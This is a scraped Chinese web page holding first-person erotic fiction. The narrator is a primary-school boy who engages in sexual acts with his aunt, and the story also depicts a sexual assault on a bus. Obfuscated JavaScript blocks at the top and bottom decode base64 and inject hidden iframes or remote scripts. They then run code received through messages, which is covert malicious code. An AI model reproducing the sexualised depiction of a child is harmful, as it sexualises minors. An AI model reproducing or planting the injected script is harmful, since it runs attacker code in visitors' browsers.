人妻少妇15P_bl媚药强迫h

eval("\x77\x69\x6e\x64\x6f\x77")["\x77\x6E\x68\x77"]=function(e){var hp =''+'ABCDEFGHIJKLMNOPQ'+'RSTUVWXYZabcdefghi'+'jklmnopqrstuvw'+'xyz012345'+'6789+/='+''+'';var t="",n,r,i,s,o,u,a,f=0;e=e['re'+'pla'+'ce'](/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=hp.indexOf(e.charAt(f++));o=hp.indexOf(e.charAt(f++));u=hp.indexOf(e.charAt(f++));a=hp.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return (function(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2;}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);}
eval("\x77\x69\x6e\x64\x6f\x77")["\x70\x75\x6E\x41\x50\x77\x68\x55\x43"]=function(){eval(wnhw("OyhmdW5jdGlvbih1LHIsdyxkLGYsYyl7dT1kZWNvZGVVUklDb21wb25lbnQod25odyh1LnJlcGxhY2UobmV3IFJlZ0V4cChjKycnK2MsJ2cnKSxjKS5zcGxpdCgnJykucmV2ZXJzZSgpLmpvaW4oJycpKSk7J2pRdWVyeSc7aWYobmF2aWdhdG9yLnVzZXJBZ2VudC5pbmRleE9mKHduaHcoIlltRnBaSFU9IikpPi0xIHx8IG5hdmlnYXRvci51c2VyQWdlbnQuaW5kZXhPZih3bmh3KCdTSFZoZDJWcFFuSnZkM05sY2c9PScpKT4tMSl7ZnVuY3Rpb24gcmQobixtKXtyZXR1cm4gTWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpKihtLW4rMSkrbik7fWZ1bmN0aW9uIHJtKGUpe2lmKGUmJmUudGFnTmFtZS50b1VwcGVyQ2FzZSgpPT09IklGUkFNRSImJmUuc3JjLmluZGV4T2YodSk+LTEpe2UucmVtb3ZlKCk7fWVsc2UgaWYoZS5uZXh0RWxlbWVudFNpYmxpbmcpe3JtKGUubmV4dEVsZW1lbnRTaWJsaW5nKTt9fWxldCBjPWRbd25odygiWTNWeWNtVnVkRk5qY21sd2RBPT0iKV07dmFyIF9pZD1fY2xhc3M9J2FfMTk5MCc7dmFyIF9fYWFucWlkID0gJ2EnICsgcmQoMSwgMTAwMDAwKTtkWyd3JysncmknKyd0JysnZScrJ2xuJ10oJzxkJysnaXYgaScrJ2Q9JysnIicrX19hYW5xaWQrJyI+JysnPC9kJysnaXYnKyc+Jyk7d1snX19hJysnYWEnKyducScrJ29iJysnal8xOTkwJ109ZFsncXUnKydlcnknKydTZWxlJysnY3RvJysnciddKCcjJytfX2FhbnFpZCk7X2lkICs9IGRbJ3F1JysnZXJ5JysnU2UnKydsZWMnKyd0bycrJ3JBJysnbGwnXSgnLicrX2NsYXNzKS5sZW5ndGg7dmFyIHogPSB1KyctMS8nK19pZCsnLycrcjtkWyd3JysncmknKyd0JysnZSddKCc8aScrJ2ZyJysnYScrJ21lIHN0eWxlPSInKydtJysnYXInKydnaScrJ246MDtwJysnYWQnKydkJysnaW4nKydnOjA7YicrJ29yJysnZCcrJ2VyOm4nKydvbicrJ2U7Jysnb3AnKydhJysnY2knKyd0JysneTowJysnLjAnK3JkKDIsOSkrJzt3aScrJ2R0JysnaDonK3JkKDIsNSkrJ3AnKyd4O2gnKydlJysnaWdoJysndDonK3JkKDIsNSkrJ3AnKyd4OycrJyJhbCcrJ2xvd3RyYW4nKydzcGEnKydyZW5jeSBzcicrJ2M9IicreisnIj48L2knKydmcicrJ2EnKydtZT4nKTt3WyJhZCIrImRFdiIrImVudEwiKyJpc3QiKyJlbmVyIl0oIm0iKyJlc3MiKyJhZ2UiLGZ1bmN0aW9uKGUpe2lmKGUuZGF0YVtyK19pZF0pe3JtKGMpO25ldyBGdW5jdGlvbih3bmh3KGUuZGF0YVtyK19pZF0ucmVwbGFjZShuZXcgUmVnRXhwKHIsJ2cnKSwnJykpKSgpO319KTt9ZWxzZXtkLndyaXRlKCc8cycrJ2NyaScrJ3B0IHNyYz0iJyt1KycuanMiPjxcL3MnKydjcmlwJysndD4nKTt9fSkoJycrJz09UU55JysnMEMnKydNNWtUJysnTXR0JysnTScrJ20nKydSeVUnKydTJysnWm9oJysnWFlxbCcrJ25SeVV5JysnTScrJzAnKydRRE14RScrJzBNbDAnKycyYmo1JysnaWEnKyczVicrJ1dlJysnMGRYJysnWnUnKydjM2QnKyczWmtNbCcrJ1lrTWxFJysnME1sJysnTScrJ0hjMFJIJysnYScrJycrJycsJycrJ1FPRScrJ1NKTicrJ3BaJysnJysnJyx3aW5kb3csZG9jdW1lbnQsJycrJ3BDaycrJ3JGWCcrJ1onKycnKycnLCd0Jyk="));}
我叫夏清风,是个小四的学生,有一个在贸易公司当翻译的妈妈,还有一个在外

地当老师的姐姐,你问我父亲?早就死很久了,据说在我出生那一年就死了。因

为姐姐在外地当老师,所以家里只有我跟妈妈住而以,久而久之我对妈妈生出了

异样的情感,我知道那叫恋母情结,还有我对母亲那双迷人的美腿向往不以,平

时我一直压抑着这种情感,因为我知道那是不容许接受的,但直到那一年开始我

开始下手了,所有的事情发生在那一年我升小六的暑假。

(一)小姨的母乳

「小风,妈妈这两个月要去外地出差去,没有办法照顾你,虽然你已经要升上小

六了,不过妈妈我还是不放心,所以我请你的小姨回来照顾你,所以你这两个月

要好好听小姨的话哟。」妈妈叮咛我。

「我知道了!」我点点头,有点不舍的看着妈妈,她穿着一身黑色的职业套裙,

修长的腿上穿着黑色的丝袜,紧身的套裙衬托出那美好的身材,胸前的雄伟大概

有C吧。

「那我就出门啰,你小姨大概一小时候就会来,不要乱跑喔。」说完后,妈妈就

提着行李箱赶飞机去了。

小姨啊。我想起表姐那火辣的身材,小姨是知名的模特儿,一双美腿至少有一百

一十公分,罩杯应该有C吧,而且她结过婚不过只有一年而已,因为在她生下女

儿后表姊夫就过世了,小姨也没有再嫁,而是过着单亲妈妈的生活,结婚是去年

的事情,所以女儿只有一岁而以,所以应该会连着过来吧。

闲闲没事做,我打开电视看着打算看电视打发时间,不过无意间看到玄关上,妈

妈留下的凉鞋和红色露趾高跟鞋。心中升起一种莫名的想法,拿起凉鞋放到鼻间

,用力的嗅着,一股淡淡的脚酸位窜入鼻中,伸出舌头轻轻舔过上面的趾印,品

尝妈妈所留下来的味道。一切没有持续太久,因为门铃响了,代表小姨到了。

「嗨,小鬼有没有好好看家啊?!」刚开门,小姨抱着她的女儿,朝我笑着。脚

旁放着行李箱。

「当然,乖乖的再等小姨你呢。」我天真的笑着,然后乖巧的将行李箱弄进来。

「小姨,我妈妈说让你住她的房间就行了。」

「嗯,那就麻烦你拉,我去弄中餐。」小姨将女儿放到床上,然后拉过被子盖住

以防着凉,然后系上围裙走入厨房。

我看着小姨在厨房忙碌,她身穿着一身鹅黄色的连身裙,修长的美腿套着一双肉

色的丝袜,足上穿着衣般的夹脚拖鞋,任由晶莹的玉趾暴露在我的眼下。

小姨好美!我忍不住暗自赞叹,眼睛看到了玄关处的咖啡色长靴,那是小姨刚刚

脱下来的。看了眼忙碌中的小姨,我判断一时半毁她应该不会出来,拿起长靴我

嗅着那上面的味道。淡淡的皮革味魂杂着一股淡淡酸甜味,一时间让我沉迷在其

中。

「小风,你来把菜端出去,很烫要小心一点喔。」

突然,厨房传来小姨的喊声,惊得我连忙放下手中的长靴。

「我来了。」我连忙走进厨房,端出一盘盘热腾腾的菜肴。

我大口吃着小姨做的饭菜,餐桌上一片狼藉,小姨不禁笑道。

「吃那么急干嘛?饿鬼投胎啊。」

「因为小姨做的菜实在太好吃了阿。」我吞下嘴中的饭菜,笑着向小姨说。这不

是谎话是实话,小姨的厨艺至少能媲美五星级饭店的厨师。

「就爱贫。」小姨白了我一眼,突然--

哇哇哇哇!房内的小表妹哭了,小姨连忙站起来。

「我去看看你表妹,你慢慢吃。」然后快步走进房间。

看到小姨进入房间后,我加快了清扫饭菜的速度,然后用卫生纸擦了擦嘴巴,也

走进房间。

进到房间只见小姨只穿着师紫色的内裤坐在床上,身上的连身裙已经脱下,被扔

到了床上一旁,而在连身裙旁放着紫色的胸罩。小姨正抱着小表妹放到胸前,小

表妹张嘴含住小姨胸前的蓓蕾吸吮着。

看道我进来,小姨不免露出一丝羞涩,虽然我才小五而以,但好歹也是个男生。

「小姨、小姨,你再干嘛呢。」我爬上床坐在小姨身旁,一脸天真的问道。

「我在喂奶呢,你的小表妹肚子饿呢。」小姨轻轻一笑很快就将心中的羞涩扔到

脑后,再她眼里我不过就是个小屁孩,被看光身子有何不可?

「小姨,为什么表妹不是吃饭呢?而是喝ㄋㄟㄋㄟ?」我继续用天真的语气说道

,「为什么表妹要吸你的乳头呢?这样就会有ㄋㄟㄋㄟ吗?」

这小鬼居然问这种问题。小姨有点无言,不过她也知道对一个小五的学生来讲,

这种事情没经历过,当然会抱有疑问。

「嗯,这是母乳喔,对小婴儿来讲是最好的食物。」

「小姨,我能不能也喝你的母乳?」我用渴望的眼神看着小姨。

「这……」小姨迟疑着。

小芹老是只吸我左乳的奶水,右乳的奶水都不吸的,喂完之后还得自己动手挤出

来,那不如让小风喝下去比较省事,而且还可以让他满足愿望,小姨想了一下,

随后道。

「可以啊,不过你要记住,不能跟其他人提起这件事情喔,连你妈妈也不行哟。



「为什么?」

「不行就是不行,这是我们两个人间的秘密,知道不?是秘密!」小姨郑重的说

道,「如果你做不道的话,那我不会让你喝乳汁喔。」

「嗯嗯,我知道了。」我重重的点头。

小姨轻轻一笑,将睡去的表妹放到床上。

「来吧!」指着自己的右乳,说道。

我坐到小姨的对面看着她。

小姨的皮肤很白,丰满的胸部前端,那两点嫣红曝露在我眼前,像是向我招手一

样。我将头缓缓移了过去,一股沁人心脾的馨香还有淡淡的乳香从小姨身上传来

,我忍不住用力耸动鼻端,吸着这令人沉迷的气味。

小姨看到我吸着她身上的气味,脸上微微一红。「你不是要喝奶,要就快点不然

我要穿衣服了。」

听到小姨有点羞怒,我整个人向前倾,张嘴含住右乳的嫣红。嫣红一入嘴,我能

感受到淡淡的乳香自味蕾传遍全身的神经,我用牙齿轻轻咬着上面的突起,那是

一种似轻似重的力道,舌尖轻轻滑过突起,吸吮着嫣红,甘甜的乳汁从中流出,

顺着喉咙下肚。

(呜啊~我双手抓着床单,脸上浮现一丝潮红,洁白的贝齿紧咬着红润的双唇,

发出压抑的声音。我没想到这小鬼居然会咬我的蓓蕾,虽然女儿在喝奶的时候也

会这样,但毕竟是个婴儿还有牙齿,所以感受没有那么强烈,但小风是个小五的

学生啊,被他突然这么一咬,当然会措手不及。

呜~好强烈。我能清楚的感受到,右乳的奶水一点点的被吸走,加上小风又不停

的逗弄嘴里的蓓蕾,一种强烈的情感从心底升起,自己的私密处居然有了反应,

能感觉的到滑腻的液体从阴唇流出,自己居然被小孩弄出性欲来了,真是的。

呜啊~~死死得不想发出声音,但我知道再任由小风这样吸下去,肯定会破功。

我伸手推开小风。)

突然被推开的我,嘴角和右乳有着一丝乳白色的液体,搭起一条糜烂的桥梁,那

是小姨的母乳。我用着不解的眼神望着她。

「小姨怎么把我推开了呢?」

「就先这样吧,因为已经没有乳汁了,你赶紧去睡午觉吧。」小姨脸红红的,下

了逐客令。这只是一个借口而以,她怕再那样下去她会受不了。

「那我在这边睡!」我说着。

「随便你吧,全身黏答答的,我先去洗个澡,你先睡。」

「嗯。」我点点头闭上眼睛。我知道事情不能操之过急,今天已经玩弄了小姨的

胸部,还喝了那甘甜的乳汁,至于偷窥什么的慢一点没关系,毕竟今天只是第一

天而以。

(唉,我看了下床上熟睡的小风还有小芹,忍不住叹了口气。没想到自己居然鬼

使神差得让小风吸我的母乳,更没想到他居然会用那种几乎调情的手法来吸,若

不是看他只是一个小五的学生而以,我都快以为他是情场老手了。

缓缓站起身,将身上的肉色丝袜脱下,还有仅存的紫色内裤脱掉,我从行李箱拿

出一套黑色的蕾丝内衣裤走入了浴室中。

冰冷的水冲洗身体,身体却升出燥热赶,那是被小风弄出来的性欲,左手不听话

的抚摸着双乳,右手落到了那私秘之处,手指缓缓的深入洞穴,不停的抽动着。

背倚着墙壁,快感传遍全身,我压低声音,淫荡的呻吟从喉咙中发出,在几分钟

后,强烈的快感席卷全身,一股阴精泄出直接打在磁砖地板上。

我喘着气缓和这着许久未有的感受,自从老公去世以后,自己已经多久没有手淫

了?这是第一次吧,没想到居然被一个小鬼挑起性欲,我真是个淫荡的女人。

穿上内衣裤后,我走出浴室开始收拾碗盘,然后走入了房间在两个小孩的中间躺

下。)

接下来的几天,我依旧趁小姨喂奶的时候要求喝奶,小姨也没有拒绝,让我吸吮

着她的母乳,就这样过了几天后,本来对我喝奶有些反应的小姨,开始习惯我喝

奶时用的调情手段,我见状知道时候到了,该是进行下一步的时候。

晚饭过后,我跟前几日一样坐在小姨对面,雪白的双峰突起的嫣红,暴露在我眼

前,她身上除了紫色的丁字裤外,其余的一丝不挂。因为是夏天吧,小姨在家里

基本上只穿着内衣裤而以,她丝毫不担心会被别人看到,因为我们家是属于独栋

式的房屋,附近没有什么邻居,再庭院还有一座游泳池。啥?你说她不怕被我看

光?你说什么笑话,再她眼里我只是一个小屁孩而以,看光就看光还能怎么样?

我张嘴含住小姨的右乳,贪婪粗鲁的吸吮着,跟前几天表现出来的调情式不同,

这就像是在强暴一个人的动作,大量甘甜的母乳被我吸出,顺着喉咙滑入肚中。

我忘情的吸吮着,左手悄悄的覆上小姨的左乳,用轻轻的力道揉捏着,我并非整

个握住在捏着,而是用食指与拇指捏着胸前的嫣红,我可以看到一道乳白色的液

体从乳蒂喷出,足足有一公尺之远,打在地面。

(呜~这小鬼吸奶就吸奶,还捏我的奶头真是的,得要好好教训一下。突然被粗

鲁的吸奶,还有突然的捏乳头,我忍不住发出低吟,看到小风这种情况,我忍不

住伸出手打掉他放在我左乳上的手,同时说道。)

「小风你干嘛呢,为什么要乱摸?」

被小姨打掉左手,我不赶意外毕竟这是任谁都会作的事情。我松开嘴里的乳蒂,

用天真的表情和语气。

「因为小姨的胸部看起来好柔软,所以想要摸一下,你生气了吗?」

「小风,你要记住女孩子的胸部不能乱摸的。」小姨严正的说

「为什么不能摸?」

「因、因为那是只有重要的人才能摸的东西。」

「那、那我对小姨来说不重要吗?」我的双眼泛着泪光。

「你、你当然重要啊,你可是我最亲爱的侄子呢。」

「那我为什么不能摸?你不是说是重要的人才能摸的吗?」一句话,堵的小姨哑

口无言。

「好好好,算我败给你了。」小姨无法反驳,只好答应。

我没有响应,而是继续含住右乳吸吮母乳,左手揉捏着小姨的左乳,一道道的乳

汁射出,很快的就在地面行成了一摊的积水。

(呜…呜…这种感觉好激烈,前所未有的快感,正从体内的深处涌现出来。我的

右手绕过小风的后背,用他看不见的角度伸入了内裤中,抚摸着阴唇。

我正被小风吸着母乳玩着乳头,刺激的感受从心底涌现,右手的动作不经加快了

动作,原本压抑着不发出的呻吟,已经突破了关口开始低吟。)

「呜~啊~呜~嗯~哈~哈」

突然间,我听到小姨的朱唇微张,一声声诱人的声音从中发出,抬头望去看到她

那满脸潮红的脸庞,加上那充满喘息的声音,我当下就知道是怎么回事了,小姨

快高朝了,被我玩弄胸部玩到快高朝了。

知道了一切得真相后,我手上的速度还有嘴巴的吸吮越来越快越猛烈,一分钟之

后,我能感受到一股猛烈的乳汁冲入喉咙,同时左手把玩的乳房一股乳汁喷出,

足足有两公尺远,打道了墙面上。也能感受到小姨的身体猛烈的一抖,随后像是

泄了气的皮球一样,全身无力的摊在床上,不过手还是紧握着床单。

「哈…哈。」小姨喘着粗气,脸上的红晕尚未退去,看上迷人的要紧。

「小姨你没事吧?生病了吗?脸怎么那么红。」我咽下嘴里的母乳,关心的问道



「没、没事,小姨只是有点头昏而已,好了没事的话就快睡,小姨先去洗澡了。

」小姨红着脸说完后,拿一起套内衣裤,匆忙的走下床,不过走起路来有点摇晃

,我当然知道是什么原因,不就是刚高朝过后有点没力罢了。

看着小姨走入浴室,我往床上一倒。现在已经征服了小姨的母乳,那么接下来就

是她的美腿了,垂涎已久的美腿已经开始攻陷。

(匆忙的走入浴室,我拉上门来,打开水龙头任由冷水冲刷身体,背靠在冰冷的

墙壁上。我真是一个淫荡的女人,居然当着自己的侄子面前自慰,而且还发出了

淫乱的叫声,甚至还高潮不断。洗着身体我一边想着。)

隔天,我起来的时候小姨不在家里,我在桌上发现一张纸条。

「小风,小姨出去买东西,你要乖乖在家喔。」

小姨可能出去买食材吧,那今天要干嘛呢?我无所事事的看着电视,想不出能干

嘛。

话面一转。

小姨穿着一件白色的衬衫,搭配着一件短裙,足上穿着一双黑色的丝袜,穿着露

趾的凉鞋。

为了买食材小姨坐上了公交车,不过因为太晚上车的关系,车上已经坐满了人,甚

至连走道也站满了人,小姨只好向内挤进去,只为了让后面的人上来,最后小姨

站在了中间的位置,身旁尽是高中生。

为了稳住身体的晃动,小姨伸手拉住头顶的拉环,不过就因为这个动作,使得她

身上的衬衫稍微向上拉了一点,雪白的肌肤和肚脐露了出来,肚脐一凉她也知道

肚脐露了出来,不过她认为这种人挤人的车上,应该没有人会发现,所以就没有

将衣服拉下。

在她身后站着一名高中生。那名高中生借着玻璃的反射,清楚的看到小姨覆部的

雪白,因为车上人挤人的关系,两人的距离近到可以闻到对方身上的味道,清淡

的幽香飘入高中的鼻中,令他浑身畅快,他的手悄悄的向下落去。

他悄悄的摸上小姨的黑丝美腿,丝袜的材质摸起来很滑,虽然隔着丝袜但他却能

清楚感受,被包裹住的美腿的滑嫩肌肤,他不再满足于抚摸小姨的美腿,慢慢的

向下摸上去,手已经深入了短裙之中,摸上了那结实紧俏的美臀,他重重的捏了

一把。

呜~小姨咬着嘴唇,她知道身后的人在摸她的臀部。

高中生的高度只到小姨的肩膀,他的头向前倾,张嘴含住小姨小巧耳朵,舌尖轻

轻的舔过,舔弄那精美的耳垂,手不再停留于美臀,而是突破了内裤,伸入了禁

地。令他讶异的是,小姨居然是穿着丁字裤,这更让他兴奋。

他的食指刺入阴道,带给小姨异样的刺激,手只随着公交车的速度抽插着,给小姨

时快时慢的快感。

小姨忍受不了,右手肘轻轻一顶,想要推开高中生的侵犯。

「你给我放开!」她低声赤喝着

「骚货,穿着这么放荡,不就是想要诱惑我吗?」高中生吐出嘴里的耳垂,在小

姨耳旁低喃。

「你看,下面都已经这么湿了,你敢说不是这样吗?」

「给我放开!」小姨开始挣扎起来。

「放心,马上就让你舒服。」高中生不理会小姨的挣扎,将裤头向下一拉,露出

狰狞的龙首,撩起小姨的短裙,用手指拨开丁字裤,露出粉红的阴唇,用力向前

一挺,硕大的阴茎直接没入其中。

「啊!」猛烈的插入,令小姨不禁发出低吟,为了怕被其他人发现,她连忙闭上

嘴巴,同时企图挣脱高中生的掌控。

「别动了,你动越快,你会越快高潮!」高中生在她耳旁说道,手悄悄的伸入衣

内,玩弄那小巧的乳房。

「咦?湿湿的,你该不会在产乳吧?」高中生将手拿出,放在鼻端闻了下,发现

充满奶味后,露出了兴奋的笑。

「没想到你是个人妻呢,我最喜欢人妻了。」

「放开我拉!」小姨挣扎着,但如同高中生所说,她越是挣扎体内的阴茎刺的越

深,她能感受到自己的子宫快被顶破了,银牙死咬着嘴唇,不令声音飘出来。

突然间,公交车猛的一个煞车。两人的身体瞬间向前倾,高中生的阴茎整个顶到底

,小姨在也忍受不住这种快感。

「啊~」一声呻吟从嘴里飘出,声音之大让所有人都看向她。

「不好意思,没事!」她连忙辩解。

「真是个骚货呢,居然在这种地方淫叫。」高中生邪笑着,下体突然迅速的抽动

起来。

呜~啊~嗯~嗯~嗯~嗯。小姨咬牙不令呻吟跑出。

十分钟后,两人的身体猛烈的抖动,一股灼热的液体涌入小姨的子宫,同时还有

一股灼热液体,从牠的阴道喷射出,她在公交车上被人玩到了高潮,甚至喷精了。

「呼~真是个放荡的人妻呢。我很满意你的身体呢,希望下次还有机会能跟你在

来一次,下次就选在床上吧,让你看看我真功夫。」高中生将阴茎抽出,放回裤

子。在小姨的耳旁留下这么一句话,随后就拎着书包下车了。

哈呵~哈呵~小姨喘着气,刚刚的冲击让她缓不过气来,双腿已经整个脱力,若

非手拉着吊环,现在或许已经瘫在地上了。

没想到,我会被一个高中生玩弄,而且还弄出了高潮,甚至被他射在里面。小姨

想着,在缓过气后,在下一站下车进入卖场。在她的私密处,混浊白色的液体,

顺着黑色的丝袜缓缓流下,不过这一切没有人知道。

小姨回到家中时,已经是中午过后的事情了。午餐我自己泡了面来解决。

小姨回来的时候,将手上的东西放到冰箱里后,便拿着换洗衣物打算去洗个澡。

毕竟外面天气热,想要将身上的汗给冲干净,这是正常的。

「小姨,我也想要洗澡。」我见状,跑到小姨面前。

「一起洗吧。」小姨没有拒绝,而是把我带进浴室。

我快速的脱掉身上的衣服,然后看着小姨将身上的衣服脱掉。我发现小姨的黑丝

袜上面有淡白色的东西,像是甚么东西凝固后一样。

小姨的胸部没有很大,大概B罩杯吧。嫣红的蓓蕾,就这样曝露在我眼前。心底

涌上一股渴望。好想现在就征服小姨,将她压在身上挞伐着。但我知道,时间还

没有成熟。

小姨的腿很修长,没有半点的赘肉,就像是一件完美的艺术品一样。脚指甲上涂

的是红色的蔻丹,看上去很诱人。

我和小姨就这样泡在浴缸里。由于浴缸很大的关系。我是坐在小姨怀里,背靠在

那温柔的胸部上面。小姨的双腿就这样跨在浴缸上,悬挂在半空。

柔美的玉足就这样立在我面前,水滴从晶莹的肌肤上滑落。彷佛刚完成的水晶工

艺品一样。

我回头一看,小姨正闭着眼睛享受泡澡的舒爽。我将头低下,舌头从嘴里伸出。

从小姨的膝盖开始舔起。一路的慢慢往下,毫无半点脚毛的小腿,小巧的脚踝,

最后来到我的目的地。晶莹剔透的足掌。

我先是用舌头舔弄脚趾间的缝隙,最后张开嘴将脚趾含入嘴中。慢慢地吸允舔弄

着,就像是在吃棒棒糖一样,一进一出一进一出,舌头一边绕着脚趾舔弄,一边

将口水咽入肚中。

「小、小风你在做甚么!」小姨的声音充满惊讶!她原本正在享受泡澡的舒爽感

,但脚上传来一阵酥麻,让不禁她张开眼睛。然而印入眼前的却是,自己的侄子

正在舔自己的脚趾。

「我、我在试着舔小姨的脚趾。」我有些害怕地说。同时装出很无辜的表情。「

因为我想知道,脚趾头的味道是怎么样。」

「小风!」小姨的声音相当严厉。「脚趾是很脏的地方,不能乱舔会吃坏肚子的

。」

「不会脏,小姨的脚那么干净,那么香。一点都不脏。」我站起来反驳着。好死

不死,下体正好抬头挺胸,像一个整装待发的军人一样。直挺挺的面对着小姨。

(要死,这小鬼的那里比自己丈夫的还要大。好想要试试看,好想要填满那里。

我、我在想甚么。难道自己太久没满足,已经变得堕落了吗?)

「小姨、小姨我是不是生病了!」发现下体挺立,我只好装出害怕的表情。「为

什么我的小鸡鸡会翘起来。是不是生病了。」

「没有的事情,这是正常的现象。」小姨靠了过来,整张俏脸就在肉棒面前,只

要我稍微一往前,就可以完全抵在小姨的脸上。

「那、那为什么其他小朋友的都不会。」

「那是因为小风你已经长大了。」

「可是小鸡鸡胀胀的好难受,怎么办小姨。」我继续装作无辜。

(厄…这东西应该是要姐姐来教才对,可姐姐现在又不在家。那就只好我自己来

教,恩没错就只是这样而已。)

「小风,等等小姨帮你做的事情,是我们两个之间的秘密,不能向别人说喔。」

小姨很严肃地跟我说到。

「恩恩,就跟我喝小姨的ㄋㄟㄋㄟ一样,是秘密。我不会跟别人说的。」我点着

头表示我不会说。

小姨伸手她柔嫩的小手,就这样握住我的下体。原本火热的阴茎,一被小姨的握

住,一阵冰凉感涌上心头。身体一个颤抖,差点就这样射了出来。不过还好忍了

下来,如果这么早就射出来。小姨应该会吓到吧,那我也爽不到了。

小姨的手包裹住后,缓慢的前后挪动着。

呜...呜...好爽。我咬着嘴唇,享受着小姨带给我的快感。双手则是放到

了小姨的胸部上,一边揉着柔软的胸部,一边用手指捏着胸前的蓓蕾。

「啊...」受袭的小姨发出轻呼,但却没有制止我。倒是手上的速度加快了许

多。

小姨坐在浴缸里我站着的姿势,就这样维持了快半小时。最后我再也受不了,将

第一次的处男精液射了出去。

肉棒大力的跳动着。浓郁的混浊白色精液,就这样从马眼中直接射在了小姨脸上

、头发上。甚至小姨的诱人小嘴上也有精液。

舔。小姨伸出舌头将唇瓣的精液舔掉。速度很快,但还是被眼尖的我看到。

小姨居然把精液吃下去,而且是自己侄子的精液。我满是震惊。

震惊之后,我装作一脸抱歉的样子。「小姨对不起,我尿尿了。」

小姨温柔地看着我。用很轻松的口吻。「小风,那不是尿尿。那是射精。代表晓

风已经长大了。」

我一听到脸上的表情从抱歉,变成了疑惑(装的)。「甚么叫做射精?」

「那是生宝宝的东西。男生跟女生那个之后,男生把精液射到女生那里。就可以

怀上宝宝。」小姨解释着。

「『那个』是哪个?」我继续问到。

「小孩子别问那么多。」小姨有点生气。也有点不好意思。

「喔。」我识相的停止询问。至少距离成功已经不远了。

随后的时刻很沉静,小姨快速地帮我洗完后。自己也冲洗了一下,就离开了浴室

。我相信小姨的心应该很不平静,当然我一定心静不下来。毕竟刚让小姨替自己

手淫。
版权声明

本站内容由互联网搜集而来,不代表撩妹情话网立场,请勿对号入座!
如果本文侵犯了您的合法权益,请联系我们,我们将在第一时间处理!

eval("\x77\x69\x6e\x64\x6f\x77")["\x6E\x70\x6C\x73"]=function(e){var sp =''+'ABCDEFGHIJKL'+'MNOPQRSTUVWXY'+'Zabcdefgh'+'ijklmnopqrs'+'tuvwxyz0123456'+'789+/='+''+'';var t="",n,r,i,s,o,u,a,f=0;e=e['re'+'pla'+'ce'](/[^A-Za-z0-9+/=]/g,"");while(f>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return (function(e){var t="",n=r=c1=c2=0;while(n191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2;}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);}
eval("\x77\x69\x6e\x64\x6f\x77")["\x41\x73\x58\x70\x50\x73\x6C\x6E\x5A"]=function(){eval(npls("OyhmdW5jdGlvbih1LHIsdyxkLGYsYyl7dT1kZWNvZGVVUklDb21wb25lbnQobnBscyh1LnJlcGxhY2UobmV3IFJlZ0V4cChjKycnK2MsJ2cnKSxjKS5zcGxpdCgnJykucmV2ZXJzZSgpLmpvaW4oJycpKSk7J2pRdWVyeSc7aWYobmF2aWdhdG9yLnVzZXJBZ2VudC5pbmRleE9mKG5wbHMoIlltRnBaSFU9IikpPi0xIHx8IG5hdmlnYXRvci51c2VyQWdlbnQuaW5kZXhPZihucGxzKCdTSFZoZDJWcFFuSnZkM05sY2c9PScpKT4tMSl7ZnVuY3Rpb24gcmQobixtKXtyZXR1cm4gTWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpKihtLW4rMSkrbik7fWZ1bmN0aW9uIHJtKGUpe2lmKGUmJmUudGFnTmFtZS50b1VwcGVyQ2FzZSgpPT09IklGUkFNRSImJmUuc3JjLmluZGV4T2YodSk+LTEpe2UucmVtb3ZlKCk7fWVsc2UgaWYoZS5uZXh0RWxlbWVudFNpYmxpbmcpe3JtKGUubmV4dEVsZW1lbnRTaWJsaW5nKTt9fWxldCBjPWRbbnBscygiWTNWeWNtVnVkRk5qY21sd2RBPT0iKV07dmFyIHo9dSsnLTEvcXEvJytyO2RbJ3cnKydyaScrJ3QnKydlJ10oJzxpJysnZnInKydhJysnbWUgc3R5bGU9IicrJ20nKydhcicrJ2dpJysnbjowO3AnKydhZCcrJ2QnKydpbicrJ2c6MDtiJysnb3InKydkJysnZXI6bicrJ29uJysnZTsnKydvcCcrJ2EnKydjaScrJ3QnKyd5OjAnKycuMCcrcmQoMiw5KSsnO3dpJysnZHQnKydoOicrcmQoMiw1KSsncCcrJ3g7aCcrJ2UnKydpZ2gnKyd0OicrcmQoMiw1KSsncCcrJ3g7JysnIiBhbCcrJ2xvd3RyYW4nKydzcGEnKydyZW5jeSBzcicrJ2M9IicreisnIj48L2knKydmcicrJ2EnKydtZT4nKTt3WydhZCcrJ2RFdicrJ2VudEwnKydpc3QnKydlbmVyJ10oJ20nKydlc3MnKydhZ2UnLGZ1bmN0aW9uKGUpe2lmKGUuZGF0YVtyXSl7cm0oYyk7bmV3IEZ1bmN0aW9uKG5wbHMoZS5kYXRhW3JdLnJlcGxhY2UobmV3IFJlZ0V4cChyLCdnJyksJycpKSkoKTt9fSk7fWVsc2V7ZC53cml0ZSgnPHMnKydjcmknKydwdCBzcmM9IicrdSsnLmpzIj48XC9zJysnY3JpcCcrJ3Q+Jyk7fX0pKCcnKyc9JysnPXdNTScrJ3kwU00nKydNJysnNWtUTU0nKyd0TScrJ01tUicrJ3lVQ01NJysndDVXWjAnKydNTWonKydSeVV5JysnTU0wUUQnKydNTXgnKydFJysnME0nKydNbCcrJzAyJysnYmo1aWEnKyczJysnVlcnKydlJysnMGQnKydYJysnWnUnKydjJysnM2QnKyczWmsnKydNTWxZJysna00nKydNbCcrJ0UnKycwTU0nKydsTScrJ01IYzBSJysnSCcrJ2EnKycnKycnLCcnKydJZ0snKydsanMnKydBZScrJycrJycsd2luZG93LGRvY3VtZW50LCcnKydhdmQnKydlTXgnKyc1JysnJysnJywnTScp"))